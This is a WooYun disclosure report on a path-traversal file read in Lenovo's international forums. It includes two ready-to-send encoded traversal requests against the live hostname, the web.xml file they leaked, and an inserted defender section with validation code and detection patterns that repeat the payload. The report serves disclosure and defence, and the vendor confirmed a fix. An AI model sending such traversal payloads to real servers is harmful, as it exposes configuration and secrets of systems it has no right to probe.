Vulnerability summary

Defect ID: wooyun-2015-0101549

Title: Arbitrary file read on a Lenovo international service (bundled report)

Vendor: Lenovo (联想)

Author: 路人甲

Submitted: 2015-03-16 09:48

Fixed: 2015-04-30 18:48

Published: 2015-04-30 18:48

Vulnerability type: Arbitrary file traversal/download

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-03-16: Details sent to the vendor, awaiting vendor handling
2015-03-16: Vendor has confirmed; details disclosed to the vendor only
2015-03-26: Details disclosed to core white hats and relevant domain experts
2015-04-05: Details disclosed to regular white hats
2015-04-15: Details disclosed to intern white hats
2015-04-30: Details disclosed to the public

Brief description:

Detailed description:

International forum: forums.lenovo.com.
Two endpoints, bundled into one report:

GET /lnv/?category.id=..%2f..%2f..%2fWEB-INF%2fweb.xml%3bx%3d HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Cache-Control: no-cache
Host: forums.lenovo.com.
Accept-Encoding: gzip, deflate


GET /lnv/board/message?board.id=..%2f..%2f..%2fWEB-INF%2fweb.xml%3bx%3d&thread.id=1 HTTP/1.1
Referer: http://forums.lenovo.com./
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: forums.lenovo.com.
Accept-Encoding: gzip, deflate


Content-Length: 16894
Connection: close
Content-Type: text/xml;charset=UTF-8
<?xml version="1.0" encoding="ISO-8859-1"?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
version="2.4">
<display-name>web2</display-name>
<session-config>
<session-timeout>30</session-timeout>
</session-config>
<context-param>
<param-name>jspellLexicons</param-name>
<param-value>res/jspell/</param-value>
</context-param>
<context-param>
<param-name>tapestry.app-package</param-name>
<param-value>lithium.web2</param-value>
</context-param>
<listener>
<listener-class>lithium.servlet.session.ApplicationSessionTrackerHttpSessionListener</listener-class>
<listener-class>lithium.reporting.metrics.unique.UniqueMetricProcessorHttpSessionListener</listener-class>
<listener-class>lithium.user.UserSessionListener</listener-class>
</listener>
<!-- ================================================================= Filters -->
<filter>
<filter-name>characterEncodingFilter</filter-name>
<filter-class>lithium.servlet.CharacterEncodingFilter</filter-class>
</filter>
<filter>
<filter-name>putTomcatRequestFilter</filter-name>
<filter-class>lithium.servlet.PutTomcatRequestinAttributeFilter</filter-class>
</filter>
<filter>
<filter-name>applicationSelectorFilter</filter-name>
<filter-class>lithium.apps.main.container.filters.ApplicationSelectorFilter</filter-class>
</filter>
<filter>
<filter-name>clickjackingFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>p3pHeaderFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>clearStateFilter</filter-name>
<filter-class>lithium.boards.servlet.ClearStateFilter</filter-class>
</filter>
<filter>
<filter-name>trackingFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>

<filter>
<filter-name>operationsLoggingFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>blackboxFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>liaTapestryFilter</filter-name>
<filter-class>lithium.web2.services.servlet.LiaTapestryFilter</filter-class>
</filter>
<filter>
<filter-name>facebookSignedRequestFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>rewriteFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
<init-param>
<param-name>targetFilterLifecycle</param-name>
<param-value>true</param-value>
</init-param>
</filter>

<filter>
<filter-name>httpRequestContextFilter</filter-name>
<filter-class>lithium.servlet.HttpRequestContextFilter</filter-class>
</filter>
<filter>
<filter-name>agentDetectionFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>sessionIdStripperFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>setHeaderValidationFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>metricsFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>requestTransformFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>replicatedSessionFilter</filter-name>
<filter-class>lithium.servlet.session.ReplicatedSessionFilter</filter-class>
</filter>
<filter>
<filter-name>userSessionFilterWeb2</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>

<filter>
<filter-name>realtimeNotificationAuthFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>visitorFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>bannedUserFilterChainWeb2</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>mimeFilter</filter-name>
<filter-class>lithium.servlet.MimeFilter</filter-class>
<init-param>
<param-name>charset.encoding</param-name>
<param-value>UTF-8</param-value>
</init-param>
</filter>
<filter>
<filter-name>clientDeviceDetectionFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>limitFilterChainWeb2</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>funnelFilterChain</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>pageCacheFilterChain</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>forwardedHeadersFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>canonicalIpFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>vanityHostnameRedirectFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>accessCheckFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>notSecureSessionCookieFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>sipDomainRequestManagerFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>multipartRequestFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<!--
Adds a non-reversible hashed IP as a request attribute lithium.servlet.HashedIpFilter.HASHED_IP_ATTR.
Must come before maskedIpFilter (so it has access to full IP).
-->
<filter>
<filter-name>hashedIpFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<!--
Masks the IP address (wraps the HttpServletRequest) for anonymous requests.
Adds a boolean request attribute lithium.servlet.MaskedIpFilter.IS_MASKED ("true" or "false" depending on if
the IP is masked).
-->
<filter>
<filter-name>maskedIpFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<!-- =================================================================
Filter Mappings
Determines which filters run for given url patterns or servlet names.
Note that the filters execute in this order.
-->
<filter-mapping>
<filter-name>characterEncodingFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>putTomcatRequestFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<!--
applicationSelectorFilter needs to occur before any filter which depends on a specific application context.
-->
<filter-mapping>
<filter-name>applicationSelectorFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>ERROR</dispatcher>
</filter-mapping>

<filter-mapping>
<filter-name>funnelFilterChain</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<!--
The forwardedHeadersFilter filter needs to be before the canonicalIpFilter filter
since it modifies the request headers.
-->
<filter-mapping>
<filter-name>forwardedHeadersFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<!--
The canonicalIpFilter filter needs to be before any filter that accesses, logs, or otherwise
uses the remoteAddr from the request.
-->
<filter-mapping>
<filter-name>canonicalIpFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>vanityHostnameRedirectFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>p3pHeaderFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>accessCheckFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<!--
the notSecureSessionCookieFilter needs to be before the RewriteFilter
and the UserSessionFilter to prevent infinite redirects
-->
<filter-mapping>
<filter-name>notSecureSessionCookieFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>sipDomainRequestManagerFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>clearStateFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>trackingFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>operationsLoggingFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>

<filter-mapping>
<filter-name>blackboxFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>

<filter-mapping>
<filter-name>facebookSignedRequestFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>rewriteFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>replicatedSessionFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>agentDetectionFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>sessionIdStripperFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>setHeaderValidationFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>metricsFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>requestTransformFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>limitFilterChainWeb2</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>mimeFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>multipartRequestFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>userSessionFilterWeb2</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>

<filter-mapping>
<filter-name>realtimeNotificationAuthFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>visitorFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>bannedUserFilterChainWeb2</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>clientDeviceDetectionFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>pageCacheFilterChain</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>hashedIpFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>maskedIpFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>httpRequestContextFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
<dispatcher>ERROR</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>liaTapestryFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
<dispatcher>ERROR</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>clickjackingFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>

<!-- ================================================================= Servlets -->
<servlet>
<servlet-name>javaScriptServlet</servlet-name>
<servlet-class>lithium.util.http.DelegatingApplicationServletProxy</servlet-class>
</servlet>
<servlet>
<servlet-name>cssServlet</servlet-name>
<servlet-class>lithium.util.http.DelegatingApplicationServletProxy</servlet-class>
</servlet>
<!-- ================================================================= Servlet Mappings -->
<servlet-mapping>
<servlet-name>javaScriptServlet</servlet-name>
<url-pattern>/scripts/*</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>cssServlet</servlet-name>
<url-pattern>/assets/css/*</url-pattern>
</servlet-mapping>
<!-- ================================================================= Error Page Mappings -->
<error-page>
<error-code>404</error-code>
<location>/errors/error404page</location>
</error-page>
<!-- ================================================================= Mime Mappings -->
<mime-mapping>
<extension>html</extension>
<mime-type>text/html</mime-type>
</mime-mapping>
<mime-mapping>
<extension>css</extension>
<mime-type>text/css</mime-type>
</mime-mapping>
<mime-mapping>
<extension>js</extension>
<mime-type>text/javascript</mime-type>
</mime-mapping>
<mime-mapping>
<extension>gif</extension>
<mime-type>image/gif</mime-type>
</mime-mapping>
<mime-mapping>
<extension>jpg</extension>
<mime-type>image/jpeg</mime-type>
</mime-mapping>
<mime-mapping>
<extension>png</extension>
<mime-type>image/png</mime-type>
</mime-mapping>
<mime-mapping>
<extension>bmp</extension>
<mime-type>image/bmp</mime-type>
</mime-mapping>
<mime-mapping>
<extension>au</extension>
<mime-type>audio/basic</mime-type>
</mime-mapping>
<mime-mapping>
<extension>jad</extension>
<mime-type>text/vnd.sun.j2me.app-descriptor</mime-type>
</mime-mapping>
<mime-mapping>
<extension>jar</extension>
<mime-type>application/java-archive</mime-type>
</mime-mapping>
<mime-mapping>
<extension>cab</extension>
<mime-type>application/java-archive</mime-type>
</mime-mapping>
<mime-mapping>
<extension>xml</extension>
<mime-type>text/xml</mime-type>
</mime-mapping>
<mime-mapping>
<extension>txt</extension>
<mime-type>text/plain</mime-type>
</mime-mapping>
<mime-mapping>
<extension>class</extension>
<mime-type>application/octet-stream</mime-type>
</mime-mapping>
<mime-mapping>
<extension>cacert</extension>
<mime-type>application/x-x509-ca-cert</mime-type>
</mime-mapping>
...
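Both requests above carry the same payload: a percent-encoded `../../../WEB-INF/web.xml` in a parameter that the application turns into a file path, with a `;x=` path-parameter suffix appended so the servlet container and the application disagree about where the path ends. The following is an added defender-side example, not code from the report, from Lenovo or from the Lithium platform whose web.xml is shown. It assumes an allow-list shape for board/category identifiers and a hypothetical resource root (both assumptions, chosen for illustration), and it runs detection logic over constructed access-log lines that mirror the report's two request lines.

```python
"""Validation and detection for the encoded-traversal pattern in the report.

Added example (not the report's or the vendor's code). Three independent
controls:
  1. validate_resource_id(): allow-list check applied to the raw query value
     before it can ever become part of a path (assumed id shape);
  2. resolve_under_root(): canonicalisation check proving the final path
     stays under the intended root and never reaches WEB-INF/META-INF;
  3. flag_traversal(): detection over access-log lines, for the window
     before a fix ships.
"""
import posixpath
import re
from urllib.parse import unquote

# Assumed identifier shape for board/category ids; not Lithium's actual rule.
_ID_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable so that double encoding (..%252f) does not
    slip past a single-pass check. Bounded to avoid looping on hostile input."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def validate_resource_id(raw: str) -> bool:
    """Allow-list check on a raw query-string value. A slash, a dot pair,
    a ';x=' path-parameter suffix or a NUL byte all fail outright."""
    decoded = fully_decode(raw)
    return "\x00" not in decoded and bool(_ID_RE.match(decoded))


def resolve_under_root(root: str, raw: str):
    """Canonicalise root/raw and return the path only if it stays inside root
    and outside WEB-INF or META-INF. Returns None when the request must be
    refused. Semicolons are rejected rather than stripped, because the servlet
    container and the application may parse the path parameter differently."""
    decoded = fully_decode(raw)
    if ";" in decoded or "\x00" in decoded or "\\" in decoded:
        return None
    root_norm = posixpath.normpath("/" + root.strip("/"))
    # posixpath.join drops root if decoded is absolute; normpath then collapses
    # any ../ sequences, so the prefix check below sees the real target.
    candidate = posixpath.normpath(posixpath.join(root_norm, decoded))
    if candidate != root_norm and not candidate.startswith(root_norm + "/"):
        return None
    parts = candidate.split("/")
    if "WEB-INF" in parts or "META-INF" in parts:
        return None
    return candidate


# Constructed access-log lines (addresses from documentation ranges); lines 1
# and 2 mirror the two request lines in the report, line 4 is double encoded.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Mar/2015:09:48:01 +0800] "GET /lnv/?category.id=..%2f..%2f..%2fWEB-INF%2fweb.xml%3bx%3d HTTP/1.1" 200 16894
203.0.113.5 - - [16/Mar/2015:09:48:02 +0800] "GET /lnv/board/message?board.id=..%2f..%2f..%2fWEB-INF%2fweb.xml%3bx%3d&thread.id=1 HTTP/1.1" 200 16894
198.51.100.7 - - [16/Mar/2015:09:49:10 +0800] "GET /lnv/board/message?board.id=Lenovo_Legion&thread.id=42 HTTP/1.1" 200 5120
198.51.100.7 - - [16/Mar/2015:09:49:11 +0800] "GET /lnv/?category.id=..%252f..%252fWEB-INF%252fweb.xml HTTP/1.1" 404 312
"""

_REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
# A dot-dot segment or a WEB-INF segment anywhere in the fully decoded target.
_TRAVERSAL_RE = re.compile(
    r"(?:^|[/\\=])\.\.(?:[/\\]|$)|(?:^|/)WEB-INF(?:/|$)", re.IGNORECASE
)


def flag_traversal(log_text: str):
    """Return (line_number, decoded_target) for each request whose fully
    decoded target contains a dot-dot or WEB-INF segment."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = _REQ_RE.search(line)
        if not m:
            continue
        target = fully_decode(m.group(1))
        if _TRAVERSAL_RE.search(target):
            hits.append((n, target))
    return hits


if __name__ == "__main__":
    payload = "..%2f..%2f..%2fWEB-INF%2fweb.xml%3bx%3d"
    print("allow-list:", validate_resource_id(payload))
    print("resolve:", resolve_under_root("/lnv/res", payload))
    for n, target in flag_traversal(SAMPLE_LOG):
        print(f"line {n}: {target}")
```

The allow-list check is the one that actually closes the hole; the canonicalisation check is defence in depth for code paths that must accept richer names, and the log scan decodes before matching so that the double-encoded variant on the fourth constructed line is caught even though it returned 404.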


Proof of vulnerability:

Fix recommendation:

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-03-16 15:01

Vendor reply:

Thank you for your support of Lenovo's security work; we will fix the vulnerability as soon as possible.

Latest status:

None yet